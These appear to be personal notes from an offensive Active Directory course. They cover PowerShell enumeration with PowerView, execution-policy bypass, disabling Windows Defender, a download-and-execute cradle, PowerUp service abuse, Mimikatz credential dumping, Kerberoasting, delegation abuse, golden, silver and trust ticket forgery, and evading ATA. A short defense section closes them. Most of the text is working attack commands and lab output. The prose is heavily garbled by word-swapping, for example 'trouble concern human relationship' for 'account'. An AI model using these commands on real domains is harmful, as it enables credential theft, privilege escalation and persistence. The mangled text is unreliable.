Lesson 1 Basics:
Active Directory:
- Directory Service used to managed Windows networks
- stores information virtually objects on the network together with makes it easily available to users together with domains
- Active Directory enabled centralized, secure direction of an entire network, which powerfulness bridge a building, a metropolis or multiple locations
- Schema - defines objects together with their attributes
- enquiry together with index machinery - provides searching together with publication of objects together with their properties
- Global Catalog - contains information virtually every object inward the directory
- Replication Service - distributes information across domain controllers
- Forest, domains together with organizational unites (OUs) are the basic edifice blocks of whatever active directory structure.
- a wood is a safety boundary - may comprise multiple domains together with each domain may comprise multiple OUs.
PowerShell:
- provides access to almost everything inward a Windows platform together with AD environs which could live useful for an attacker
- provides the capability of running powerful scripts completely from retention making it ideal for foothold shells/boxes
- tardily to larn together with actually powerful
- based on .NET framework together with is tightly integrated amongst Windows
- PowerShell Core is platform independent
Open upwardly Windows PowerShell ISE every bit an Administrator:
See file amongst powershell commands...
Cmdlets are used to perform an activeness together with a .Net obkect is returned every bit the output
Cmdlets bring parameters for dissimilar operations
They have got aliases.
These are NOT executables, you lot tin write your ain cmdlet amongst few lines of script.
Examples:
cd C:\
dir: //this works
dir.exe: //this does not
Important!
Use the below command for listing all cmdlets:
get-command -commandtype cmdlet
There are many interesting cmdlets from a pentester's perspective.
For example:
get-process
, listing processes running on a system.
get-command -Name *process*
get-command -Verb set
It is a GUI Editor/Scripting Environment.
Tab Completion, context-sensitive help, syntax highlighting, selective execution, in-line assistance are around of the useful features.
Comes amongst a handy console pane to run commands from the ISE.
Execution Policy:
- this is NOT a safety measure, but it is a prevention stair out to foreclose a user from accidently executing scripts
- several ways to bypass:
powershell -executionbypass bypass .\script.ps1
powershell -c <cmd>
powershell -enc
Turn off the Windows Defender:
Set-MpPreference -disablerealtimeMonitoring $true
.\Invoke-Encode.ps1
Get-ExecutionPolicy
powershell -ep bypass
Powershell.exe -ExecutionPolicy bypass -File C:\Users\win10\Downloads\nishang-master\Utility\Invoke-Encode.ps1
- Powershell also supports modules.
- H5N1 module tin live imported with:
Import-module <path to module>
- all the commands inward a module tin live listed with:
Get-Command -Module <modulename>
Get-Command -module Get-ScheduledTask
Get-command -module
################
. c:\AD\Tools\Invoke-Encode.ps1
- the '.' inward forepart of the path (Above) is called point sourcing.
################
Whenever in that location is a command execution opportunity, PowerShell scripts tin live executed using next methods:
- Download execute cradle
iex(New-Object net.webclient).DownloadString('https://webserver/payload.ps1')
- Encodedcommand
>help powershell.exe //to let out out powershell.exe available commands!
CheckOut Invoke-CradleCrafter:
http://github.com/danielbohannon/Invoke-CradleCrafter
#####################
Lesson 2 Domain Enumeration:
PowerShell together with AD:
- [ADSI]
- .Net Classes
- Native Executables
- PowerShell (.NET classes or WMI or Active Directory Module)
Let's outset wirh Domain Enumeration together with map diverse entities, trusts, relationships together with privileges of the target domain.
We volition work opened upwardly source tools, such every bit PowerView, for domain enumeration.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
We volition also work Microsoft Active Directory module:
https://docs.microsoft.com/en-us/powershell/module/addsadministration/
After spending around fourth dimension to install PowerView together with the Install-ActiveDirectoryModule.ps1, nosotros tin finally outset doing around domain enumeration!
PS C:\users\win10\Downloads> powershell.exe -executionpolicy unrestricted
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\users\win10\Downloads> .\Install-ActiveDirectoryModule.ps1
NAME
Install-ADModule
SYNOPSIS
Installs the AD PowerShell module from RSAT for Windows 10
(partial re-create above)
- Get the electrical flow domain(PowerView)
Get-NetDomain
Get-NetDomain -Domain lethallab.local
- Get the electrical flow domain SID:
Get-DomainSID
- Using Active Directory module:
Get-ADDomain
Get-ADDomain -Identity lethallab.local
(Get-ADDomain).DomainSID.Value
Let's setup the environment!
You should brand certain you lot have got a adept working Domain Controller, every bit all the information is beingness pulled from a Domain Controller.
PS C:\Users\win10\Downloads\PowerSploit-master\Recon> Import-Module .\PowerView.ps1
PS C:\users\win10\Downloads\PowerSploit-master\recon> get-command -module recon
PS C:\users\win10\Downloads\PowerSploit-master\recon> get-netdomain
PS C:\Users\win10\Downloads\PowerSploit-master\Recon> get-netdomain -domain lethallab.local
Forest : lethallab.local
DomainControllers : {Win2008SRV.lethallab.local, WIN2016SRV.lethallab.local}
Children : {}
DomainMode : Windows2003Domain
DomainModeLevel : 2
Parent :
PdcRoleOwner : Win2008SRV.lethallab.local
RidRoleOwner : Win2008SRV.lethallab.local
InfrastructureRoleOwner : Win2008SRV.lethallab.local
Name : lethallab.local
-Get Domain Controllers for a domain:
PS C:\Users\win10\Downloads> Get-NetDomainController
PS C:\Users\win10\Downloads> Get-NetDomainController -domain lethallab.local
- Using Active Directory module:
Get-ADDomainController
Get-ADDomainController -Discover -DomainName lethallab.local
- Get users of a domain:
Get-NetUser
get-netuser | choose name
Get-NetUser -Domain lethallab.local
Get-NetUser -UserName win10
-Using ActiveDirectory module:
Get-ADUser -Filter * -Properties *
Get-ADUser -Server ps-dc.lethallab.local
Get-ADUser -Identity win10
-Get all the groups inward the electrical flow domain:
Get-NetGroup
Get-NetGroup *admin*
- Using Active Directory Module:
Get-ADGroup -Filter * | choose Name
Get-ADGroup -Filter 'Name -like "*admin*"' | choose Name
get-adgroup -filter {Name -like "*admin*"} |select name
- Get all the members of the Domain Admins group:
Get-NetGroupMember -GroupName "Domain Admins"
- Get ActiveDirectory Module
Get-ADGroupMember -Identity "Domain Admins" -Recursive
- Get the grouping membership of a user:
Get-NetGroup -UserName "labuser"
- Using ActiveDirectory Module:
Get-ADPrincipalGroupMembership -Identity labuser
- Get all computers of the domain:
Get-NetComputer
Get-NetComputer -FullData
- Using ActiveDirectory Module:
Get-ADComputer -Filter * | choose Name
Get-ADComputer -Filter * -Properties *
Note to self: You should continue inward heed together with consider that the information is pulled from the information your Domain Controller has, together with it's non an indication that the physical reckoner even hence exists. Most companies continue obsolete information inward Active Directory, because they never acquire through an Active Directory maintenance together with cleanup. In either case, the information tin even hence live useful inward your exploitation attempts!
- Find all machines on the electrical flow domain where the electrical flow user has local admin access:
Find-LocalAdminAccess -verbose
- Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -verbose
- List Sessions on a special computer:
Get-NetSession -ComputerName ops-dc
Note: Domain Administrator is a real sought afterwards target, but DO NOT acquire afterwards the Domain Admin (DA) blindly! Make certain getting the DA trouble concern human relationship is the goal/purpose of the engagement!
- Find computers where a domain admin is logged inward together with electrical flow user has access:
Invoke-UserHunter -CheckAccess -Verbose
- Above gets a listing of machines from DC together with listing sessions together with logged on users_from_each machine! This is non tardily to find, but it's even hence a useful command to run!
Hands-On number 1:
- Enumerate the next for the electrical flow domain:
Users, Computers, Domain Administrators, Shares, Sessions on the Domain Controller.
Demonstration: Block user hunting(session enumeration) on the Domain Controller!!!!!!
- nosotros tin work a script called NetCease.ps1 that strips such permissions from a box.
######
Domain Enumeration - ACL:
You tin let out ACLS inward Active Directory nether a user (for example), Security tab, Advanced, together with the Permissions tab.
- Get the ACLs associated amongst the specified object:
Get-ObjectACL -SamAccountName win10 -ResolveGUIs
- Get the ACLs associated amongst the specified prefix to live used for search:
Get-ObjectACL -ADSprefix 'CN=Administrator, CN=Users' -Verbose
- We tin also enumerate ACLs using Active Directory Module but without resolving GUIDs:
(Get-ACL 'AD:\CN=win10, CN=Users, DC=win2008srv, DC=lethallab, DC=local').Access
- To aspect for interesting ACEs:
Invoke-ACLScanner -ResolveGUIDs
Hands-On number 2:
- Enumerate next for the electrical flow domain:
Check if win10 user has Write/Modify permissions on whatever objects!
##############
Domain Enumeration - Trusts:
- Get a listing of all domain trusts for the electrical flow domain, if you lot have got any, but it's possible that inward your abode lab network, you lot volition non have got any, since you lot exclusively have got ane wood or (if any) kid domain:
Get-NetDomainTrust //don't worry if you lot don't have got whatever inward your lab domain
Get-NetDomainTrust -Domain redps.offensiveps.lethallab.local //this would live a kid domain of the lethallab.local domain
- Using Active Directory Module:
Get-ADTrust -Filter *
Get-ADTrust -Identity redps.offensiveps.lethallab.local
- Get details virtually the electrical flow forest:
Get-NetForest
Get-NetForest -Forest lethallab.local
- Using Active Directory Module:
Get-ADForest
Get-ADForest -Identity lethallab.local
- Get all domains inward the electrical flow forest:
Get-NetForestDomain
Get-NetForestDomain -Forest lethallab.local
- Using ActiveDirectory Module:
(Get-ADForest).Domains
- Get trusts inward the wood (if you lot have got a wood trust inward your lab together with if you lot don't, together with then don't aspect an output):
Get-NetForestTrust
Get-NetForestTrust -Forest lethallab.local
- Using ActiveDirectory Module:
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
Hands-On number 3:
Enumerate all the trusts - domain trusts, external trusts together with others for the electrical flow forest.
#####################
Lesson 3 Local Privilege Escalation:
- upwardly to now, nosotros have got exclusively done a lot of enumeration!
In an AD environment, in that location are multiple scenarios which Pb to privilege escalation. We had a aspect for the following:
- Hunting for Local Admin access on other machines
- Hunting for high privilege domain trouble concern human relationship (like a Domain Admin)
There are diverse ways to privilege escalate on Windows boxes:
- Missing patches
- Automated deployment together with AutoLogon passwords inward clear text
- AlwaysInstallElevated (any user tin run MSI on SYSTEM)
- Misconfigured Services
- DLL HiJacking
- Token Manipulation or Impersonation
PowerUp:
- Let's work PowerUp from PowerSploit for local privilege escalation past times abusing services.
- Get Services amongst unquotes paths together with a infinite inward their call or executable path:
Get-ServiceUnquotes -Verbose
ex:
Get-WmiObject win32_service | fl *
For instance if inward the path c:\ftpserver\ftp server\myftp\ftp.exe , the c:\ftpserver\ftp server\myftp\ftp.exe is unquoted, an assailant tin drib an ftp.exe, together with every bit before long every bit the user, correct the correct permissions, run the program, nosotros tin privilege escalate. That's why it's called the unquoted path vulnerability! For this to NOT work, the path would have got to live inward quotes, similar this:
"c:\ftpserver\ftp server\myftp\ftp.exe" .
- Get Services where the electrical flow user tin write to its binary path:
Get-ModifiableServiceFile -Verbose
- Get the Services which electrical flow user tin modify:
Get-ModifiableService -Verbose
- Run all Checks:
Invoke-AllChecks
Example:
PS C:\Users\win10\Downloads\PowerSploit-master> cd .\Privesc\
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> ls
Directory: C:\Users\win10\Downloads\PowerSploit-master\Privesc
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/2/2018 11:55 PM 26485 Get-System.ps1
-a---- 9/2/2018 11:55 PM 562841 PowerUp.ps1
-a---- 9/2/2018 11:55 PM 1564 Privesc.psd1
-a---- 9/2/2018 11:55 PM 67 Privesc.psm1
-a---- 9/2/2018 11:55 PM 4297 README.md
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Import-Module .\PowerUp.ps1
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking if user is inward a local grouping amongst administrative privileges...
[+] User is inward a local grouping that grants administrative privileges!
[+] Run a BypassUAC assault to get upwardly privileges to admin.
[*] Checking for unquoted service paths...
[*] Checking service executable together with declaration permissions...
ServiceName : ISSUSER
Path : "C:\Program Files\LANDesk\LDClient\issuser.exe" /SERVICE
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem <----- amongst LOCALSYSTEM!!!!!!!
AbuseFunction : Install-ServiceBinary -Name 'ISSUSER'
CanRestart : False <------- nosotros demand to hold off for the machine to live rebooted
ServiceName : ISSUSER
Path : "C:\Program Files\LANDesk\LDClient\issuser.exe" /SERVICE
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ISSUSER'
CanRestart : False
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\win10\AppData\Local\Microsoft\WindowsApps
IdentityReference : LETHALLAB\win10
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\win10\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\win10\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials inward registry...
[*] Checking for modifidable registry autoruns together with configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application puddle together with virtual directory passwords...
[*] Checking for plaintext passwords inward McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc>
##########
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse -examples
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse -Name AbyssWebServer -UserName 'lethallab\wi
n10'
- the lastly Invoke-ServiceAbuse command, volition add together the electrical flow user: win10 to the local Administrators group. We had to read the Invoke-ServiceAbuse amongst the -examples parameter, hence that nosotros tin larn how to run the command properly. We volition demand to logoff from the trouble concern human relationship together with log on, hence that the novel permissions bring effect!
And right away amongst Admin privileges nosotros tin run the command below to disable AV protection:
>Set-MpPreference -DisableRealtimeMonitoring $true
Hands-On number 4:
Exploit a service on your lab VM together with get upwardly privileges to local administrator!
#####################
Lesson four Lateral Movement Protocols together with tools:
PowerShell Remoting
Think of it every bit psexec on steroids.
You volition let out this increasingly used inward enterprises. Enabled past times default on Server 2012 onwards!
You may demand to enable remoting (Enable-PSRemoting) on a Desktop Windows machines, Admin privs are required to exercise that.
You acquire elevated musical rhythm out on remote scheme if admin creds are used to authenticate (which is the default setting).
One-on-One
PSSession:
- Interactive
- Runs inward a novel procedure (wsmprovhost)
- Is Stateful
Useful cmdlets:
- New-PSSession
- Enter-PSSession
Example:
PS C:\Users\Administrator.WIN2008SRV> new-pssession -ComputerName win2016srv
Id Name ComputerName State ConfigurationName Availability
-- ---- ------------ ----- ----------------- ------------
1 Session1 win2016srv Opened Microsoft.PowerShell Available
PS C:\Users\Administrator.WIN2008SRV> $sess = New-PSSession -computername win2016sr
PS C:\Users\Administrator.WIN2008SRV> Enter-PSSession -session $sess
[win2016srv]: PS C:\Users\administrator\Documents> hostname
WIN2016SRV
PowerShell Remoting:
- One-to-Many
- Also Known every bit Fan-Out remoting
- non-interactive
- executes commands parallely
- useful cmdlets
- Invoke-Command
- Invoke-Command
- Run commands together with scripts on:
- multiple remote computers
- inward disconnected session (v3)
- every bit background chore together with more.
- the best affair inward PowerShell for passing the hashes, using credentials together with executing commands on multiple remote computers.
- Use-Credential parameter to exceed username/password.
- work below to execute commands or semicolon separated scripts:
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list of servers>)
example:
Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName win2016srv
PS C:\Users\Administrator.WIN2008SRV> Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName win2016srv
lethallab\administrator
WIN2016SRV
Invoke-Command -ScriptBlock{$who = whoami} -ComputerName win2016srv
Invoke-Command -ScriptBlock{$who} -ComputerName win2016srv
- work below command to execute scripts from files:
Invoke-Command -FilePath c:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list of servers>)
ex:
Invoke-Command -FilePath c:\AD\Tools\Invoke-Encode.ps1 -ComputerName Win2016srv
powershell.exe -ep bypass
. c:\AD\Tools\Invoke-Mimikatz.ps1
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ComputerName win2016srv
- Use below to execute "Stateful" commands:
$Sess = New-PSSession -ComputerName Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
$sess = New-PSSession -computername win2016sr
Invoke-Command -ScriptBlock{$who = whoami} -Session $sess
Invoke-Command -ScriptBlock{$who} -Session $sess
Invoke-Mimikatz:
- the script could live used to dump credentials, tickets together with to a greater extent than using mimikatz amongst PowerShell without dropping the exe to the disk.
- it is useful for passing together with replaying hashes, tickets together with for many exciting Active Directory attacks
- using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could live useful from this script!
- mimikatz is even hence beingness detected, but nosotros tin even hence work it amongst downloaded cradle, or everywhere where nosotros tin execute commands or powershell.
- Dump Credentials on a local machine:
Invoke-Mimikatz -DumpCreds
- Dump certs on a local machine:
Invoke-Mimikatz -DumpCerts
- Dump Credentials on multiple remote machines:
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
- Invoke-Mimikatz uses PowerShell remoting cmdlet Invoke-Command to run the to a higher house command. Thus, credentials or administrative access to the remote computers is required!
- "Over-pass-the-hash" generate tokens from hashes:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:. /ntlm:<ntlmhash> /run:powershell.exe"'
(we tin run whatever command instead of the powershell.exe)
Token Manipulation:
- it is possible to use/impersonate tokens available on a machine
- oft tokens are available on machines due to interactive logons, accessing resources, running processes, SSO applications, etc.
- tin nosotros work Invoke-TokenManipulation from PowerSploit or Incognito for token impersonation
- administrative privileges are required to suit token privileges.
- List all the tokens on a machine:
Invoke-TokenManipulation -ShowAll
- List all unique, usable tokens on a machine:
Invoke-TokenManipulation -Enumerate
- Start a novel procedure amongst token from a specific user:
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
- Start intelligence procedure amongst token of around other process:
Invoke-TokenManipulation -CreateProcess "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -ProcessID 500
#############################
Video five Domain Privilege Escalation:
NOTE: around information below powerfulness non live accurate, because I didn't have got a trust domain configured inward my abode lab; hence care for it amongst a grain of salt, but know that the commands are accurate together with the exclusively affair you lot should worry virtually is the domains inward the command.
Read upwardly on Kerberos authentication together with how the customer reckoner contacts the KDC/DC server, to have the TGT/TGS hence that it tin access an application server together with also how every step, it's abusable!
Kerberoast:
- offline swell of service trouble concern human relationship passwords
- the Kerberos session ticket (TGS) has a server portion which is encrypted amongst the password hash of the service account. This makes it possible to asking a ticket together with exercise offline brute-forcing.
- service accounts are many times ignored (passwords are rarely changed) together with have got Domain Admin privilege access.
- password hashes of service accounts could live used to create Silver tickets.
- presented past times Tim Medin at DerbyCon 2014.
We are afterwards the TGT encrypted ticket amongst krbtgt hash when requesting a TGS ticket (TGS-REQ).
TGS encrypted using target service's NTLM hash (TGS-REP).
We tin asking a TGS from whatever service together with the KDC volition response amongst a TGT ticket.
- Find Service Accounts:
GetUserSPNs
https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
- PowerView:
Get-NetUser -SPN
Note: for the to a higher house command, you lot should know which user accounts are domain admins!
- Active Directory module (to let out krbtgt together with priv service accounts)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
- Request a ticket:
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQL/win2016srv.lethallab.local:SQLEXPRESS"
- Request a ticket using PowerView:
Request-SPNTicket
- Check if the ticket has been granted:
klist.exe
- Export all tickets using Mimikatz:
Invoke-Mimikatz -Command '"kerberos::list /export"'
ls
Crack the Service trouble concern human relationship password:
python.exe .\tgsrepcrack.py .\passwords.txt '.\2-40a10000-labuser@MSSQLvc ops-win2016srv.lethallab.local SQLEXPRESS-lethallab.local.kirbi'
Kerberos Delegation:
- Kerberos Delegation allows the "to reuse the end-user credentials to access resources hosted on a dissimilar server". Like an application server or database server. This is to a greater extent than oft than non used where Kerberos Double Hop is required.
- Impersonating the incoming/authenticating user is necessary for whatever sort of Kerberos delegation to work.
- Kerberos delegation is of 2 types:
- Unconstrained (only selection till Server 2003)
- Constrained
How does Kerberos Delegation work:
- a user provides credentials to the Domain Controller
- the DC returns a TGT
- the user requests a TGS for the spider web service on Web Server
- The DC provides a TGS.
- the user sends the TGT together with TGS to the spider web server.
- the spider web server service trouble concern human relationship uses the user's TGT to asking a TGS for the database server from the DC.
- the spider web server service trouble concern human relationship connects to the database server every bit the user.
Unconstrained Delegation:
When laid for a special service account, Unconstrained delegation allows delegation to whatever service on that special machine.
The service trouble concern human relationship tin together with then asking access to whatever service inward the domain past times impersonating the incoming user (because the DC placed the user's TGT within the TGS inward stair 4). In our example, the spider web server service trouble concern human relationship tin asking access to whatever service inward the domain every bit the user connecting to it.
This could live used to escalate privileges inward instance nosotros tin compromise such a machine together with a Domain Admin (or other high privilege user) connects to that machine.
- Discover domain computers which have got unconstrained delegation enabled using PowerView:
Get-NetComputer -UnConstrained
- Using Active Directory Module:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
- We demand to compromise the server where Unconstrained Delegation is enabled together with hold off for or describe a fast ane on a high privilege user to connect to the box. Once such a user is connected, nosotros tin export all the tickets, including the TGT of that user using the next command:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Note: nosotros demand administrator rights on the server, where Unconstrained Delegation is enabled!
- the ticket tin live reused:
Invoke-Mimikatz -Command '"kerberos::ptt c:\tickets\admin.kirbi"'
Constrained Delegation:
- Introduced inward Server 2008
- every bit the call suggests, constrained delegation allows access exclusively to specified services on specific computers!
- a typical abusable scenario is when a pupil authenticates using a non-kerberos authentication together with Protocol Transition is used past times Kerberos to back upwardly a unmarried sign on.
- Couple of Kerberos extensions come upwardly into play for Protocol Transition but nosotros are non going to beak over them.
- The service trouble concern human relationship must have got TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION-T2A4D UserAccountControl attribute.
- the service trouble concern human relationship tin access all the services specified inward its msDS-AllowedToDelegateTo attribute.
- around other interesting number is that the delegation occurs non exclusively for the specified service but for whatever service running nether the same account. There is no validation for the SPN specified.
- Enumerate users together with computers amongst constrained delegation enabled.
- Using PowerView (dev):
.\PowerView-Dev.ps1
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
- Using Active Directory Module:
Get-AdObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
- nosotros demand to acquire clear text password or the NTLM hash of the service account. It tin together with then live used amongst Kekeo:
https://github.com/gentilkiwi/kekeo/
.\asktgt.exe /user:termadmin /domain:lethallab.local /key:abf05c4e729e45781acd30ed80674b1c /ticket:termadmin.kirbi
- Now, using s4u from Kekeo, asking a TGS:
\s4u.exe /tgt:termadmin.kirbi /user:administrator@lethallab.local /service:cifs/ops-sqlsrvone.lethallab.local
- Use the TGS:
Invoke-Mimikatz -command '"kerberos:Ptt cifs.ops-sqlsrvone.lethallab.local.kirbi"'
ls \\ops-sqlsrvone.lethallab.local\C$
- recollect that the delegation is non restricted past times SPN, it is possible to create alternate tickets. Exploit it :)
############################
Video six Persistence Techniques:
- in that location are many, but nosotros volition exclusively rear 2 of them together with these 2 are actually useful
- H5N1 golden ticket is signed together with encrypted past times the hash of krbtgt trouble concern human relationship which makes it a valid TGT ticket.
- since user trouble concern human relationship validation is non done past times the Domain Controller (KDC service) until TGT is older than xx minutes, nosotros tin work fifty-fifty deleted/revoked accounts.
- the krbtgt user hash could live used to impersonate whatever user amongst whatever privileges from fifty-fifty a non-domain machine.
- unmarried password alter has no consequence on this ticket.
- Execute mimikatz on DC:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName win2016srv
- On Any Machine:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:lethallab.local /sid:s-1-5-21-32-70384115-3177237293-604223749 /krbtgt:5c1a7d30a872cac2b732e7857589d97 /id:500 /groups:513 /ptt"'
- To work the DCSync characteristic for getting krbtgt hash execute the next command amongst DA privileges for ops domain:
Invoke-Mimikatz -Command '"lsadump:dcsync /user:ops\krbtgt'"
- H5N1 valid TGS (Golden ticket is TGT).
- Encrypted together with Signed past times the NTLM hash of the service trouble concern human relationship (Golden ticket is signed past times hash of krbtgt) of the service running amongst that account.
- Services rarely depository fiscal establishment jibe PAC (Privileged Attribute Certificate).
- Services volition allow access exclusively to the services themselves.
- For example, using hash of the Domain Controller reckoner account, the below command provides access to shares on the DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:lethallab.local /sid:s-1-5-21-3270384115-3177237293-604223748 /target:win2008srv.lethallab.local /service:cifs /rc4:536752aef9acef8ad3b089a281830b1 /id:500 /user:Administrator /ptt"'
#######################
Video seven Privilege Escalation Across Trusts together with Domains:
Child to Forest Root:
- Domains inward the same wood have got an implicit two-way trust amongst the wood root
- There is a trust key betwixt the parent together with kid domains.
- There are 2 ways of escalating privileges betwixt 2 domains of the same forest:
- krbtgt hash
- Tryst tickets
Look upwardly Child to Parent Trust Flow together with read upwardly on it!
Child to Forest Root using Trust Tickets:
- So what is required to forge trust tickets is, obviously, the trust key:
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
- An inter-realm TGT tin live forged:
Invoke-Mimikatz -Command '"Kerberos::golden /domain:win2008srv.lethallab.local /sid:s-1-5-21-133038098-372414864-1077246548 /sids:s-1-5-21-3270384115-3177237393-604224748-519 /rc4:f43d2a6daf7641d745fb225be755d8110 /user:Administrator /service:krbtgt /target:powershell.local /ticket:c:\users\Administrator\Desktop\trust_tkt.kirbi"'
- Use the TGS to access the targeted service:
.\kirbikator.exe lsa .\CIFS.ps-dc.powershell.local.kirbi ls \\ps-dc.powershell.local\C$
- Get a TGS for a service (CIFS below) inward the target domain past times using the forged trust ticket:
.\asktgs.exe c:\users\administrator\Desktop\trust_tkt.kirbi CIFS/ps-dc.powershell.local
- Tickets for other services (like HOST together with RPCSS for WMI, HOST together with HTTP for PowerShell Remoting together with WinRM) tin live created every bit well.
Child to Forest Root using krbtgt hash:
- SID history in ane trial again:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:offensiveps.powershell.local /sid:s-1-5-21-2969453985-3470385542-739374646 /krbtgt:a9d1cf9d08b6701bca220079b1557506 /sids:s-1-5-21-257853-8781-2508153159-3419410681-519 /ticket:krb_tkt.kirbi"'
- On a machine of offensivepc domain:
Invoke-Mimikatz -Command '"kerberos::pt c:\test\krb_tkt.kirbi"'
- We right away have got Enterprise Admin Privileges:
ls //ps-dc.powershell.local/C$
#######################
Video eight Detection together with Defense:
- Do non allow or bound login of DAs to whatever other machine other than the Domain Controller. If logins to around server is necessary, exercise non allow other administrators to login to that machine!
- Do NOT run services amongst DA account. Many adept credential reuse defenses are rendered useless because of it.
Some Important Event ID:
-Event ID:
- 4624: Account Logon
- 4634: Admin Logoff
- 4672: Admin Logon
Detection together with Defense against Kerberoast:
Events:
- Security Event ID 4769 - H5N1 Kerberos ticket was requested
Migitation:
- Service Account Passwords should live difficult to gauge (greater than 25 characters)
- Use Managed Service Accounts (Automatic alter of password periodically together with delegated SPN Management)
https://technet.microsoft.com/en-us/library/jj128431(v=ws.11).aspx
SID filtering:
- avoid attacks which abuse SID history attribute (child to rootage domain privilege escalation, that is, DA from a Child to EA on wood root).
- enabled past times default on all inter-forest trusts. Intra-Forest trusts are assumed secured past times default (Microsoft considers wood together with non the domain to live a safety boundary).
- But, since SID filtering has potential to suspension applications together with user access, it is oft disabled.
Selective Authentication:
- inward an inter-forest trust, if Selective Authentication is configured, users betwixt the trusts volition non live automatically authenticated. Individual access to domains together with servers inward the trusting domain/forest should live given.
Microsoft ATA (Advanced Threat Analytics):
- traffic destined for Domain Controller(s) is mirrored to ATA sensors together with a user activity profile is construct over fourth dimension - work of computers, credentials, log on machines, etc.
- Collect Event 4776 (The DC attempted to validate the credentials for an account) to abide by credential replay attacks.
- Can DETECT behaviour anomalies!
- Useful for detecting:
- Recon: trouble concern human relationship enumeration, Netsession enumeration
- Compromised Credentials Attacks: Brute force, high privilege account/service trouble concern human relationship exposed inward clear text, Honey token, odd protocol (NTLM together with Kerberos)
- Credential/Hash/Ticket Replay attacks.
Bypassing ATA:
- ATA, for all its goodness, tin live bypassed together with avoided
- The key is avoid talking to the DC every bit long every bit possible together with brand seem the traffic nosotros generate every bit assailant normal!
Architectural Changes:
LAPS(Local Administrator Password Solution):
- Centralized storage of passwords inward AD amongst periodic randomizing where read permissions tin live access controlled
- Storage inward clear text, transmission is encrypted
- LAPS into: https://technet.microsoft.com/en-us/mt227395.aspx
- Abusing LAPS feature:
https://blog.netspi.com/running-laps-around-cleartext-passwords/
Privileged Administrative Workstations (PAWs):
- a hardened workstation for performing sensitive tasks similar management of domain controllers, cloud infrastructure, sensitive trouble concern functions, etc.
- tin render protection from phishing attacks, OS vulnerabilities, credential replay attacks.
Privileged Administrative Workstations (PAWs):
Multiple strategies:
- Separate privilege together with hardware for administrative together with normal tasks
- Admin Jump servers to live accessed exclusively from a PAW
- Having a VM on a PAW for user tasks
Active Directory Administrative Tier Model
Composed of 3 levels exclusively for administrative accounts:
- Tier 0 - Accounts, Groups, together with computers which have got privileges across the company similar domain controllers, domain admins, company admins.
- Tier 1 - Accounts, Groups together with Computers which have got access to resources having meaning amount of trouble concern value. H5N1 mutual illustration role is server administrators who hold these operating systems amongst the powerfulness to conduct on all company services.
- Tier 2 - Administrator accounts which have got administrative command of meaning amount of trouble concern value that is hosted on user workstations together with devices. Examples, include Help Desk together with reckoner back upwardly administrators because they tin conduct on the integrity of almost whatever user data.
So nosotros are implementing: Control Restrictions, Logon Restrictions (and Directional from Tier 2, to Tier 1, to Tier 0).
ESAE (Enhanced Security Admin Environment):
Dedicated administrative wood for managing critical assets similar administrative users, groups together with computers.
Since a wood is considered a safety boundary rather than a domain, this model provides enhanced safety controls.
The Administrative wood is also called the Red Forest!
Administrative users inward a production wood are used every bit criterion non-privileged users inward the administrative forest.
